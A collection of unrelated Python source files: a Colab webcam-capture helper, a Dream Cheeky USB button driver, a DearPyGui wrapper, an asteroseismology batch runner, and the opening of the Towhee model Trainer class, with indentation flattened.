# Google Colab: https://colab.research.google.com/drive/1a2seyb864Aqpu13nBjGRJK0AIU7JOdJa?usp=sharing
#
# based on: https://colab.research.google.com/notebooks/snippets/advanced_outputs.ipynb#scrollTo=2viqYx97hPMi
#
from IPython.display import display, Javascript
from google.colab.output import eval_js
from base64 import b64decode, b64encode
import numpy as np
def init_camera():
"""Create objects and functions in HTML/JavaScript to access local web camera"""
js = Javascript('''
// global variables to use in both functions
var div = null;
var video = null; // <video> to display stream from local webcam
var stream = null; // stream from local webcam
var canvas = null; // <canvas> for single frame from <video> and convert frame to JPG
var img = null; // <img> to display JPG after processing with `cv2`
async function initCamera() {
// place for video (and eventually buttons)
div = document.createElement('div');
document.body.appendChild(div);
// <video> to display video
video = document.createElement('video');
video.style.display = 'block';
div.appendChild(video);
// get webcam stream and assing to <video>
stream = await navigator.mediaDevices.getUserMedia({video: true});
video.srcObject = stream;
// start playing stream from webcam in <video>
await video.play();
// Resize the output to fit the video element.
google.colab.output.setIframeHeight(document.documentElement.scrollHeight, true);
// <canvas> for frame from <video>
canvas = document.createElement('canvas');
canvas.width = video.videoWidth;
canvas.height = video.videoHeight;
//div.appendChild(input_canvas); // there is no need to display to get image (but you can display it for test)
// <img> for image after processing with `cv2`
img = document.createElement('img');
img.width = video.videoWidth;
img.height = video.videoHeight;
div.appendChild(img);
}
async function takeImage(quality) {
// draw frame from <video> on <canvas>
canvas.getContext('2d').drawImage(video, 0, 0);
// stop webcam stream
//stream.getVideoTracks()[0].stop();
// get data from <canvas> as JPG image decoded base64 and with header "data:image/jpg;base64,"
return canvas.toDataURL('image/jpeg', quality);
//return canvas.toDataURL('image/png', quality);
}
async function showImage(image) {
// it needs string "data:image/jpg;base64,JPG-DATA-ENCODED-BASE64"
// it will replace previous image in `<img src="">`
img.src = image;
// TODO: create <img> if doesn't exists,
// TODO: use `id` to use different `<img>` for different image - like `name` in `cv2.imshow(name, image)`
}
''')
display(js)
eval_js('initCamera()')
def take_frame(quality=0.8):
"""Get frame from web camera"""
data = eval_js('takeImage({})'.format(quality)) # run JavaScript code to get image (JPG as string base64) from <canvas>
header, data = data.split(',') # split header ("data:image/jpg;base64,") and base64 data (JPG)
data = b64decode(data) # decode base64
data = np.frombuffer(data, dtype=np.uint8) # create numpy array with JPG data
img = cv2.imdecode(data, cv2.IMREAD_UNCHANGED) # uncompress JPG data to array of pixels
return img
def show_frame(img, quality=0.8):
"""Put frame as <img src="data:image/jpg;base64,...."> """
ret, data = cv2.imencode('.jpg', img) # compress array of pixels to JPG data
data = b64encode(data) # encode base64
data = data.decode() # convert bytes to string
data = 'data:image/jpg;base64,' + data # join header ("data:image/jpg;base64,") and base64 data (JPG)
eval_js('showImage("{}")'.format(data)) # run JavaScript code to put image (JPG as string base64) in <img>
# argument in `showImage` needs `" "`
print("[INFO] defined: init_camera(), take_frame(), show_frame()")
#----------------------------------------------------------------------------------------------------------------------
# class similar to `cv2.VideoCapture(src=0)`
# but it uses JavaScript function to get frame from web browser canvas
import cv2
class BrowserVideoCapture():
width = 640
height = 480
fps = 30
frames_count = 100
pos_frames = 0
def __init__(self, src=None):
# init JavaScript code
init_camera()
#self.pos_frames = 0
def read(self):
# value for `cv2.CAP_PROP_POS_FRAMES`
self.pos_frames += 1
# return the frame most recently read from JS function
return True, take_frame()
def get(self, key):
# get WIDTH, HEIGHT, FPS, etc.
if key == cv2.CAP_PROP_POS_FRAMES: # 1
return self.pos_frames
elif key == cv2.CAP_PROP_FRAME_WIDTH: # 3
return self.width
elif key == cv2.CAP_PROP_FRAME_HEIGHT: # 4
return self.height
elif key == cv2.CAP_PROP_FPS: # 5
return self.fps
elif key == cv2.CAP_PROP_FRAME_COUNT: # 7
return self.frames_count # ??
else:
print('[BrowserVideoCapture] get(key): unknown key:', key)
print('See: https://docs.opencv.org/3.4/d4/d15/group__videoio__flags__base.html')
return 0
#def set(self, key, val):
# # set WIDTH, HEIGHT, FPS, etc.
# if key == cv2.CAP_PROP_FRAME_WIDTH:
# self.width = val
# elif key == cv2.CAP_PROP_FRAME_HEIGHT:
# self.height = val
# elif key == cv2.CAP_PROP_FPS:
# self.fps = val
# else:
# print('[BrowserVideoCapture] set(key, val): unknown key:', key)
# print('See: https://docs.opencv.org/3.4/d4/d15/group__videoio__flags__base.html')
print("[INFO] defined: BrowserVideoCapture()")
#----------------------------------------------------------------------------------------------------------------------
#
# example how to use `BrowserVideoCapture` in `BrowserWebcamVideoStream`
# but I didn't test it because `scenedetect` doesn't need `BrowserWebcamVideoStream`.
# `scenedetect` needs `cv2.VideoCapture` or `BrowserVideoCapture`
# which have `read()` and also `get(key)`.
# maybe if you would add `.get(key)` like in `BrowserVideoCapture()`
# then you could use `BrowserWebcamVideoStream()` instead of `cv2.VideoCapture`
#
from threading import Thread
import cv2
# class similar to WebcamVideoStream
class BrowserWebcamVideoStream():
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
#self.stream = BrowserVideoCapture(0) # argument is not used
self.stream = BrowserVideoCapture()
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# I don't use directly `take_frame()`
# but I use `read()` from `BrowserVideoCapture()`
# which runs `take_frame()`.
return self.stream.read()
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
print("[INFO] defined: BrowserWebcamVideoStream()")
#----------------------------------------------------------------------------------------------------------------------
import cv2
# - code -
#vs = BrowserWebcamVideoStream(src=0) # instead of `WebcamVideoStream`
#vs.start()
#cap = cv2.VideoCapture('Our Story.mp4', 0) # video on server
cap = BrowserVideoCapture(src=0)
while True:
ret, frame = cap.read()
if ret:
frame = cv2.putText(frame, "Hello World!", (0,0), cv2.FONT_HERSHEY_PLAIN, 50, (255,255,255))
show_frame(frame)
|
button.py
|
import datetime
import threading
from typing import Callable
import usb
from py_dream_cheeky import DreamCheekyThread, EventType, DreamCheekyEvent
BUTTON_VENDOR_ID = 0x1d34
BUTTON_PRODUCT_ID = 0x000d
def find_button_devices():
return list(usb.core.find(find_all=True, idVendor=BUTTON_VENDOR_ID, idProduct=BUTTON_PRODUCT_ID))
class ButtonEventType(EventType):
BUTTON_PRESS = "press"
BUTTON_RELEASE = "release"
BUTTON_CLICK = "click"
BUTTON_HOLD = "hold"
BUTTON_DOUBLE_CLICK = "double click"
LID_OPEN = "lid open"
LID_CLOSE = "lid close"
class DreamCheekyButtonThread(DreamCheekyThread):
"""A DreamCheekyButtonThread detects lid/button events for a single button device.
:param device: A USB button device to monitor. If None, then the first USB button device in the system is used.
:param hold_duration: The duration in milliseconds to generate a DreamCheeky.BUTTON_HOLD event (default 1000).
:param event_handler: A function to be called asynchronously when lid and button events are generated (default None)
:param enqueue_events: If True, then ButtonEvents are added to the event queue (default False).
"""
def __init__(
self,
device: usb.core.Device = None,
event_handler: Callable[[DreamCheekyEvent], None] = None,
enqueue_events: bool = False,
hold_duration: int = 1000
):
super().__init__(device, event_handler, enqueue_events)
self.running = False
self.read_timeout = 100
self.hold_duration = datetime.timedelta(milliseconds=hold_duration)
self.double_click_delay = datetime.timedelta(milliseconds=300)
self.interface = None
self.endpoint = None
def init(self):
if self.device is None:
self.device = usb.core.find(idVendor=BUTTON_VENDOR_ID, idProduct=BUTTON_PRODUCT_ID)
if self.device is None:
raise RuntimeError('Device not found')
if self.device.is_kernel_driver_active(0):
self.device.detach_kernel_driver(0)
config = self.device.get_active_configuration()
self.interface = config[(0, 0)]
self.endpoint = usb.util.find_descriptor(
self.interface,
custom_match=lambda e: (usb.util.endpoint_direction(e.bEndpointAddress) == usb.util.ENDPOINT_IN)
)
self.running = True
def run(self):
self.init()
previous_lid_open = previous_button_pressed = False
hold_detected = False
last_press_time = last_click_time = datetime.datetime.fromtimestamp(0)
while self.running:
try:
lid_open, button_pressed = self.read_button_data()
now = datetime.datetime.now()
################################################################################
# Lid events
if lid_open and not previous_lid_open:
self.handle_event(ButtonEventType.LID_OPEN)
if not lid_open and previous_lid_open:
self.handle_event(ButtonEventType.LID_CLOSE)
################################################################################
# Button events
# Detect long hold
if button_pressed and previous_button_pressed:
if not hold_detected and now - last_press_time >= self.hold_duration:
hold_detected = True
self.handle_event(ButtonEventType.BUTTON_HOLD)
# Detect single click and double click
if not button_pressed and previous_button_pressed:
# if now - last_press_time < self.hold_duration:
if not hold_detected:
if now - last_click_time < self.double_click_delay:
self.handle_event(ButtonEventType.BUTTON_DOUBLE_CLICK)
else:
self.handle_event(ButtonEventType.BUTTON_CLICK)
last_click_time = now
if button_pressed and not previous_button_pressed:
self.handle_event(ButtonEventType.BUTTON_PRESS)
last_press_time = now
if not button_pressed and previous_button_pressed:
self.handle_event(ButtonEventType.BUTTON_RELEASE)
previous_lid_open, previous_button_pressed = lid_open, button_pressed
if not button_pressed:
hold_detected = False
except usb.core.USBError as error:
if 'Operation timed out' in error.args:
continue
usb.util.release_interface(self.device, self.interface)
self.device.attach_kernel_driver(0)
def read_button_data(self):
""" Returns (is_lid_open: bool, is_button_pressed: bool). Raises usb.core.USBError after self.read_timeout. """
self.device.ctrl_transfer(
0x21,
0x09,
0x00,
0x00,
[0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02],
0
)
data = self.device.read(
self.endpoint.bEndpointAddress,
self.endpoint.wMaxPacketSize,
self.read_timeout
)
return bool(data[0] & 2), not data[0] % 2
def stop(self):
self.running = False
def handle_event(self, event_type):
if not isinstance(event_type, ButtonEventType):
raise ValueError('event_type must be a ButtonEvent')
event = DreamCheekyEvent(self, self.device, event_type)
if self.enqueue_events:
self.event_queue.put_nowait(event)
if self.event_handler is not None:
t = threading.Thread(target=self.event_handler, args=(event,))
t.start()
def get_event_queue(self):
return self.event_queue
|
DearPyGuiWrapper.py
|
from threading import Thread
import dearpygui.dearpygui as dpg
class DearPyGuiWrapper:
""" Wrapper for dearpygui window """
def __init__(self, title):
""" inicializacja """
self._ready = False
self._viewport_size = [1280, 720]
self._title = title
self.dpg = dpg
# Uruchamia funkcję blokującą _start_gui w nowy wątku
self._gui_thread = Thread(target=self._start_gui)
self._gui_thread.start()
# self._del_callback = del_callback
# wait for thread to init
while not(self._ready):
pass
def _start_gui(self):
""" Funkcja blokująca inicializuje i startuje DearPyGui """
self.dpg.create_context()
self.dpg.create_viewport(
title=self._title, width=self._viewport_size[0], height=self._viewport_size[1])
self.dpg.add_window(label="Window", tag="Window")
self.dpg.set_primary_window("Window", True)
self.dpg.set_viewport_resize_callback(self._on_resize)
self.dpg.setup_dearpygui()
self.dpg.show_viewport()
self._ready = True
with self.dpg.font_registry():
with self.dpg.font("Roboto-Regular.ttf", 16) as default_font:
self.dpg.add_font_range(0x0100, 0x017F)
self.dpg.bind_font(default_font)
self.dpg.start_dearpygui()
# call del before context gets destroyed, it won't be called automatically
self.__del__()
self.dpg.destroy_context()
def _on_resize(self, sender, app_data, user_data):
""" ustawia _viewport_size przy zmianie rozmiaru okna """
self._viewport_size = (app_data[0], app_data[1])
def get_size(self):
""" zwraca rozmiar okna """
return self._viewport_size
def get_title(self):
""" zwraca tytuł okna """
return self._title
def set_title(self, new_title):
""" ustawia tytuł okna """
self.dpg.set_viewport_title(new_title)
self._title = new_title
def __del__(self):
pass
if __name__ == "__main__":
# testy
class TestApp(DearPyGuiWrapper):
def __init__(self):
self.count = 0
DearPyGuiWrapper.__init__(self, "PipeSubs")
self.dpg.add_button(
parent="Window", callback=self.set_button_value)
def set_button_value(self, sender, app_data, user_data):
self.count += 1
self.dpg.configure_item(sender, label=str(self.count))
self.dpg.add_button(parent="Window")
app = TestApp()
|
runner.py
|
# library imports
from multiprocessing import Pool, cpu_count, Process
from copy import deepcopy
from typing import Dict, List, Tuple
import json
from os import makedirs, getcwd
import os
import traceback
import shutil
from uncertainties import ufloat, ufloat_fromstr
import time
# scientific imports
import numpy as np
# project imports
from data_handler.file_reader import load_file, look_for_file
from data_handler.data_refiner import refine_data,get_magnitude
from data_handler.signal_features import nyqFreq
from evaluators.compute_flicker import calculate_flicker_amplitude, flicker_amplitude_to_frequency
from evaluators.compute_nu_max import compute_nu_max, compute_fliper_exact
from evaluators.compute_priors import priors
from background_file_handler.fileModels.bg_file_creator import create_files
from background_file_handler.backgroundProcess import BackgroundProcess
from data_handler.write_results import save_results,is_bayes_factor_good
from res.conf_file_str import general_analysis_result_path
from support.directoryManager import cd
from support.printer import print_int, Printer
from res.conf_file_str import general_nr_of_cores, analysis_list_of_ids, general_kic, cat_analysis, cat_files, \
cat_general, cat_plot, internal_literature_value, analysis_folder_prefix, general_sequential_run, \
analysis_noise_values, internal_noise_value, analysis_number_repeats, internal_run_number, internal_delta_nu, \
internal_mag_value, internal_teff, internal_path, general_run_diamonds, internal_force_run,general_check_bayes_run,\
analysis_nr_noise_points,analysis_target_magnitude,analysis_nr_magnitude_points,internal_multiple_mag,\
analysis_nu_max_outer_guess,internal_id,analysis_file_path
from support.exceptions import ResultFileNotFound, InputFileNotFound, EvidenceFileNotFound
import uuid
def deepcopy_dict(dict_object : Dict):
cp = deepcopy(dict_object)
cp[internal_id] = str(uuid.uuid4())
return cp
def add_value_to_kwargs(kwargs, val, names, parameter, type_val):
if names[0] in val.dtype.names:
if len(names) == 2:
if names[1] in val.dtype.names:
kwargs[parameter] = type_val(val[names[0]], val[names[1]])
else:
kwargs[parameter] = type_val(val[names[0]], 0)
else:
try:
kwargs[parameter] = type_val(val[names[0]])
except AttributeError:
kwargs[parameter] = type_val(val[names[0]], 0)
return kwargs
def run(screen, file: str):
conf_list, nr_of_cores = kwarg_list(file)
Printer.total_runs = len(conf_list)
if general_sequential_run in conf_list[0]:
sequential_run = conf_list[0][general_sequential_run]
else:
sequential_run = False
if not sequential_run:
Printer.set_screen(screen)
else:
Printer.set_screen(None)
p = Process(target=Printer.run)
p.start()
if sequential_run: # MacOS cannot multiprocess for some reason. Stupid shit shit shit shit
for i in conf_list:
run_star(i)
else:
pool = Pool(processes=nr_of_cores)
pool.map(run_star, conf_list)
# print_int("KILL_SIR",conf_list[0])
p.join()
def kwarg_list(conf_file: str) -> Tuple[List[Dict], int]:
"""
Returns a list of configuration for the runner
:param conf_file: basic configuration filename
:return: an iterable list of configurations
"""
kwarg_list = []
conf_file_list = conf_file.split(",")
nr_of_cores = None
for kwargs_file in conf_file_list:
with open(kwargs_file, 'r') as f:
kwargs = json.load(f)
# determine number of cores
if general_nr_of_cores not in kwargs[cat_general].keys() and nr_of_cores == None:
nr_of_cores = 1
elif nr_of_cores == None:
nr_of_cores = kwargs[cat_general][general_nr_of_cores]
if nr_of_cores > cpu_count():
nr_of_cores = cpu_count()
kwargs[cat_general][general_nr_of_cores] = nr_of_cores
# Check analysis list!
if analysis_list_of_ids not in kwargs.keys():
raise ValueError(f"You need to set a list of ids to be analyzed with '{analysis_list_of_ids}'")
copy_dict = {}
# Copy all items from the general category
for key, value in kwargs[cat_general].items():
copy_dict[key] = value
# Copy all items from the file category
try:
for key, value in kwargs[cat_files].items():
copy_dict[key] = value
except KeyError:
pass
# Copy all items from the plot category
try:
for key, value in kwargs[cat_plot].items():
copy_dict[key] = value
except:
pass
# Copy all items from analysis category
for key, value in kwargs[cat_analysis].items():
copy_dict[key] = value
if ".txt" in str(kwargs[analysis_list_of_ids]):
data = np.genfromtxt(str(kwargs[analysis_list_of_ids]), names=True).T
else:
data = kwargs[analysis_list_of_ids]
if analysis_number_repeats in kwargs[cat_analysis]:
repeat = int(kwargs[cat_analysis][analysis_number_repeats]) + 1
repeat_set = True
else:
repeat = 2
repeat_set = False
try:
mag_list = [i['mag'] for i in data]
except TypeError:
data = [data] # if single target in file, we need to create a list of data to make it iterable
mag_list = [i['mag'] for i in data]
if analysis_target_magnitude in kwargs[cat_analysis]:
copy_dict[internal_multiple_mag] = True
else:
copy_dict[internal_multiple_mag] = False
for i in data:
for j in range(1, repeat):
cp = deepcopy_dict(copy_dict)
try:
cp = add_value_to_kwargs(cp, i, ['id'], general_kic, int)
cp = add_value_to_kwargs(cp, i, ['nu_max', 'nu_max_err'], internal_literature_value, ufloat)
cp = add_value_to_kwargs(cp, i, ['delta_nu', 'delta_nu_err'], internal_delta_nu, ufloat)
cp = add_value_to_kwargs(cp, i, ['mag'], internal_mag_value, float)
cp = add_value_to_kwargs(cp, i, ['T_eff'], internal_teff, float)
except:
try:
cp[general_kic] = int(i)
except:
continue
cp[internal_path] = getcwd()
if not cp[analysis_file_path].startswith("/"):
cp[analysis_file_path] = f"{cp[internal_path]}/{cp[analysis_file_path]}"
#Adding working path if no absolute path was given for files
if repeat_set:
if analysis_folder_prefix in cp:
pre = cp[analysis_folder_prefix]
else:
pre = "KIC"
cp[analysis_folder_prefix] = f"{pre}_{cp[general_kic]}/run_{j}"
cp[internal_run_number] = j
if analysis_noise_values in kwargs[cat_analysis]:
if analysis_nr_noise_points in kwargs[cat_analysis].keys():
nr = kwargs[cat_analysis][analysis_nr_noise_points]
else:
nr = kwargs[cat_analysis][analysis_noise_values]*10
noise_values = np.linspace(0,kwargs[cat_analysis][analysis_noise_values],nr)
for k in noise_values:
k = float('%.1f' % k)
newcp = deepcopy_dict(cp)
newcp[internal_noise_value] = k
if analysis_folder_prefix in cp:
pre = newcp[analysis_folder_prefix]
else:
pre = "KIC"
if repeat_set:
pre = f"{pre}/noise_{k}"
else:
pre = f"{pre}_{cp[general_kic]}/noise_{k}"
newcp[analysis_folder_prefix] = pre
kwarg_list.append(newcp)
elif analysis_target_magnitude in kwargs[cat_analysis]:
min_mag = max(mag_list)
if analysis_nr_magnitude_points in kwargs[cat_analysis].keys():
nr = kwargs[cat_analysis][analysis_nr_magnitude_points]
else:
nr = 5
mag_values = np.linspace(min_mag,kwargs[cat_analysis][analysis_target_magnitude],nr)
for k in mag_values:
k = float('%.1f' % k)
newcp = deepcopy_dict(cp)
copy_dict["Original magnitude"] = i['mag']
newcp[internal_mag_value] = k
if analysis_folder_prefix in cp:
pre = newcp[analysis_folder_prefix]
else:
pre = "KIC"
if repeat_set:
pre = f"{pre}/mag_{k}"
else:
pre = f"{pre}_{cp[general_kic]}/mag_{k}"
newcp[analysis_folder_prefix] = pre
kwarg_list.append(newcp)
else:
kwarg_list.append(cp)
return kwarg_list, nr_of_cores
def run_star(kwargs: Dict):
"""
Runs a full analysis for a given kwargs file.
:param kwargs: Run conf
"""
t1 = time.time()
if analysis_folder_prefix in kwargs.keys():
prefix = kwargs[analysis_folder_prefix]
else:
prefix = "KIC"
path = f"{kwargs[general_analysis_result_path]}{prefix}_{kwargs[general_kic]}/"
if os.path.exists(path) and ((internal_force_run in kwargs.keys() and not kwargs[
internal_force_run]) or internal_force_run not in kwargs.keys()):
with cd(path):
if os.path.exists("results.json") and not os.path.exists("errors.txt"):
with open('results.json','r') as f:
old_res = json.load(f)
kwargs["time"] = float(old_res['Runtime'])
print_int("Done", kwargs)
return
try:
shutil.rmtree(path)
except FileNotFoundError:
pass
try:
makedirs(path)
except FileExistsError:
pass
with cd(path):
try:
#print_int("Starting run", kwargs)
# load and refine data
data = load_file(kwargs)
with open("conf.json", 'w') as f:
if internal_literature_value in kwargs.keys():
kwargs[internal_literature_value] = f"{kwargs[internal_literature_value]}"
if internal_delta_nu in kwargs.keys():
kwargs[internal_delta_nu] = f"{kwargs[internal_delta_nu]}"
json.dump(kwargs, f, indent=4)
if internal_literature_value in kwargs.keys():
kwargs[internal_literature_value] = ufloat_fromstr(kwargs[internal_literature_value])
if internal_delta_nu in kwargs.keys():
kwargs[internal_delta_nu] = ufloat_fromstr(kwargs[internal_delta_nu])
data,kwargs = refine_data(data, kwargs)
np.save("lc", data)
# compute nu_max
print_int("Computing nu_max", kwargs)
"""
sigma_ampl = calculate_flicker_amplitude(data)
f_ampl = flicker_amplitude_to_frequency(sigma_ampl)
nu_max, f_list, f_fliper = compute_nu_max(data, f_ampl, kwargs)
"""
# if internal_literature_value in kwargs:
# nu_max = kwargs[internal_literature_value].nominal_value
# else:
if analysis_nu_max_outer_guess in kwargs.keys():
nu_max = kwargs[analysis_nu_max_outer_guess]
else:
nu_max = compute_fliper_exact(data, kwargs)
#nu_max = kwargs[internal_literature_value].nominal_value
f_fliper = nu_max
f_list = []
if internal_literature_value in kwargs.keys():
print_int(f"Nu_max guess: {'%.2f' % nu_max}, fliper: {f_fliper} literature: {kwargs[internal_literature_value]}", kwargs)
else:
print_int(f"Nu max guess: {'%.2f' % nu_max}, fliper: {f_fliper}", kwargs)
# create files for diamonds and run
prior, params = priors(nu_max, data, kwargs)
print_int(f"Priors: {prior}", kwargs)
cnt =1
while cnt <=3:
create_files(data, nyqFreq(data), prior, kwargs)
proc = BackgroundProcess(kwargs)
if general_run_diamonds in kwargs.keys():
if kwargs[general_run_diamonds]:
proc.run()
else:
proc.run()
if general_check_bayes_run in kwargs.keys():
if is_bayes_factor_good(kwargs):
break
else:
break
cnt +=1
kwargs['Number of DIAMONDS runs'] = cnt
print_int("Saving results", kwargs)
# save results
save_results(prior, data, nu_max, params, proc, f_list, f_fliper, t1, kwargs)
delta_t = time.time() -t1
kwargs["time"] = delta_t
print_int("Done", kwargs)
except (EvidenceFileNotFound, ResultFileNotFound, InputFileNotFound) as e:
error = f"{e.__class__.__name__} : {str(e)}\n"
print_int("Done", kwargs)
trace = traceback.format_exc()
with open("errors.txt", "w") as f:
f.write(error)
f.write(trace)
except Exception as e:
print_int("Done", kwargs)
error = f"{e.__class__.__name__} : {str(e)}\n"
trace = traceback.format_exc()
with open("errors.txt", "w") as f:
f.write(error)
f.write(trace)
|
trainer.py
|
# coding=utf-8
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import os
import torch
import torch.distributed as dist
from typing import Union, Dict, Any, Optional
from pathlib import Path
from collections.abc import Iterable
from torch import nn
from torch import optim
from torch.optim import Optimizer
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.dataset import Dataset
from torch.multiprocessing import Process
from towhee.data.dataset.dataset import TowheeDataSet, TorchDataSet
from towhee.trainer.callback import TensorBoardCallBack, ProgressBarCallBack, PrintCallBack, ModelCheckpointCallback, \
EarlyStoppingCallback, TrainerControl, Callback
from towhee.trainer.metrics import get_metric_by_name
from towhee.trainer.modelcard import ModelCard, MODEL_CARD_NAME
from towhee.trainer.utils.trainer_utils import STATE_CHECKPOINT_NAME, MODEL_NAME, set_seed, reduce_value, \
is_main_process, send_to_device
from towhee.trainer.training_config import TrainingConfig
from towhee.utils.log import trainer_log
from towhee.trainer.optimization.optimization import get_scheduler
from towhee.trainer.callback import CallbackList, _get_summary_writer_constructor
WEIGHTS_NAME = "pytorch_model.bin"
TEMP_INIT_WEIGHTS = "./temp_init_weights.pt"
NAME = "name_"
CUSTOM = "custom_"
no_option_list = ["no", "null", "None", None, False]
def _construct_loss_from_config(module: Any, config: Union[str, Dict]):
"""
construct from the config, the config can be class name as a `str`, or a dict containing the construct parameters.
"""
instance = None
if isinstance(config, str):
construct_name = getattr(module, config)
instance = construct_name()
elif isinstance(config, Dict):
optimizer_construct_name = config[NAME]
construct_name = getattr(module, optimizer_construct_name)
kwargs = {}
for arg_name in config:
if arg_name != NAME:
kwargs[arg_name] = config[arg_name]
instance = construct_name(**kwargs)
return instance
def _construct_scheduler_from_config(module: Any, config: Union[str, Dict]):
"""
construct from the config, the config can be class name as a `str`, or a dict containing the construct parameters.
"""
instance = None
if isinstance(config, str):
construct_name = getattr(module, config)
instance = construct_name()
elif isinstance(config, Dict):
scheduler_construct_name = config[NAME]
construct_name = getattr(module, scheduler_construct_name)
kwargs = {}
for arg_name in config:
if arg_name != NAME:
kwargs[arg_name] = config[arg_name]
instance = construct_name(**kwargs)
return instance
def _construct_optimizer_from_config(module: Any, config: Union[str, Dict], model=None):
"""
construct from the config, the config can be class name as a `str`, or a dict containing the construct parameters.
"""
instance = None
if isinstance(config, str):
construct_name = getattr(module, config)
if model is not None:
instance = construct_name(model.parameters())
elif isinstance(config, Dict):
optimizer_construct_name = config[NAME]
construct_name = getattr(module, optimizer_construct_name)
kwargs = {}
for arg_name in config:
if arg_name != NAME:
kwargs[arg_name] = config[arg_name]
if model is not None:
trainable_params = [p for p in model.parameters() if p.requires_grad]
instance = construct_name(trainable_params, **kwargs)
return instance
def freeze_bn(model):
classname = model.__class__.__name__
if classname.find("BatchNorm") != -1:
model.eval()
class Trainer:
"""
A `Trainer` is used to train a pytorch model.
Args:
model (`nn.Module`):
A pytorch model.
training_config (`TrainingConfig`):
A `TrainingConfig` instance can be loaded from a yaml file.
train_dataset (`Union[Dataset, TowheeDataSet]`):
It can be a kind of `torch.utils.data.dataset.Dataset` or `TowheeDataSet`
eval_dataset (`Union[Dataset, TowheeDataSet]`):
The same as `train_dataset`, and it is not strictly necessary if you do not want to eval.
train_dataloader (`Union[DataLoader, Iterable]`):
When the `train_dataloader` is passed in, trainer will use it to load data
instead of constructing by input dataset.
eval_dataloader (`Union[DataLoader, Iterable]`):
The same as `train_dataloader`, and it is not strictly necessary also.
model_card (`ModelCard`):
Model card may contain other information of a model, and it is not strictly necessary.
Examples:
>>> import torch
>>> import torchvision.models as models
>>> from towhee.trainer.trainer import Trainer
>>> from towhee.trainer.training_config import TrainingConfig
>>> from towhee import dataset
>>> from torchvision import transforms
>>> import warnings
>>> warnings.filterwarnings("ignore")
>>> model = models.resnet18()
>>> fake_transform = transforms.Compose([transforms.ToTensor()])
>>> train_data = dataset('fake', size=2, transform=fake_transform)
>>> val_data = dataset('fake', size=1, transform=fake_transform)
>>> training_config = TrainingConfig(output_dir="train_res",
... tensorboard=None,
... epoch_num=2,
... batch_size=1,
... dataloader_num_workers=0,
... print_steps=1)
>>> trainer = Trainer(model, training_config, train_dataset=train_data, eval_dataset=val_data)
>>> type(trainer)
<class 'towhee.trainer.trainer.Trainer'>
>>> trainer.train() # Some values below are not necessarily reproducible
2022-03-01 19:01:54,314 - 8601085440 - trainer.py-trainer:324 - WARNING: TrainingConfig(...)
epoch=1/2, global_step=1, epoch_loss=7.107283592224121, epoch_metric=0.0
epoch=1/2, global_step=2, epoch_loss=6.959554195404053, epoch_metric=0.0
epoch=1/2, eval_global_step=0, eval_epoch_loss=6.694866180419922, eval_epoch_metric=0.0
epoch=2/2, global_step=3, epoch_loss=6.165490627288818, epoch_metric=0.0
epoch=2/2, global_step=4, epoch_loss=6.197325706481934, epoch_metric=0.0
epoch=2/2, eval_global_step=1, eval_epoch_loss=6.0876030921936035, eval_epoch_metric=0.0
>>> trainer.train(resume_checkpoint_path="train_res/epoch_1")
2022-03-01 19:01:57,004 - 8601085440 - trainer.py-trainer:324 - WARNING: TrainingConfig(...)
epoch=2/2, global_step=1, epoch_loss=6.165490627288818, epoch_metric=0.0
epoch=2/2, global_step=2, epoch_loss=6.277336120605469, epoch_metric=0.0
epoch=2/2, eval_global_step=0, eval_epoch_loss=6.097333908081055, eval_epoch_metric=0.0
>>> trainer.save(path="another_save_path")
>>> trainer.load(path="another_save_path")
>>> trainer.epoch
2
>>> model = models.resnet18()
>>> inputs = [torch.randn(1, 3, 224, 224), torch.Tensor([1]).type(torch.LongTensor)]
>>> model.eval() # turn on eval mode
ResNet(
...
)
>>> trainer.evaluate_step(model, inputs)
{'eval_step_loss': 7.10837459564209, 'eval_epoch_loss': 6.350093841552734, 'eval_epoch_metric': 0.0}
>>> trainer.update_metrics(model, inputs, torch.Tensor(1))
(5.2800750732421875, 0.0)
>>> trainer.compute_metric(model, inputs)
0.0
>>> trainer.evaluate(model, {"epoch": 1, "eval_global_step": 1})
epoch=1/2, eval_global_step=1, eval_epoch_loss=5.654547214508057, eval_epoch_metric=0.0
{'epoch': 1, 'eval_global_step': 2, 'eval_step_loss': 7.526906967163086, 'eval_epoch_loss': 5.654547214508057, 'eval_epoch_metric': 0.0}
>>> trainer.predict(inputs[0]).shape
torch.Size([1, 1000])
>>> model.train() # turn on train mode
ResNet(
...
)
>>> trainer.train_step(model, inputs)
{'step_loss': 7.10837459564209, 'epoch_loss': 5.862236976623535, 'epoch_metric': 0.0}
>>> trainer.compute_loss(model, inputs)
tensor(7.1084, grad_fn=<NllLossBackward>)
>>>
>>> from towhee.trainer.callback import Callback
>>> from typing import Dict
>>> class MyCallback(Callback):
... def on_eval_begin(self, logs: Dict) -> Dict:
... print("on_eval_begin...")
...
>>> my_callback = MyCallback()
>>> trainer.add_callback(my_callback)
>>> trainer.evaluate(model, logs={"epoch": 1, "eval_global_step": 1})
on_eval_begin...
epoch=1/2, eval_global_step=1, eval_epoch_loss=6.070321083068848, eval_epoch_metric=0.0
{'epoch': 1, 'eval_global_step': 2, 'eval_step_loss': 7.526906967163086, 'eval_epoch_loss': 6.070321083068848, 'eval_epoch_metric': 0.0}
"""
def __init__(
self,
model: nn.Module = None,
training_config: TrainingConfig = None,
train_dataset: Union[Dataset, TowheeDataSet] = None,
eval_dataset: Union[Dataset, TowheeDataSet] = None,
train_dataloader: Union[DataLoader, Iterable] = None,
eval_dataloader: Union[DataLoader, Iterable] = None,
model_card: ModelCard = None
):
if training_config is None:
output_dir = "tmp_trainer"
trainer_log.warning("No `TrainingConfig` passed.")
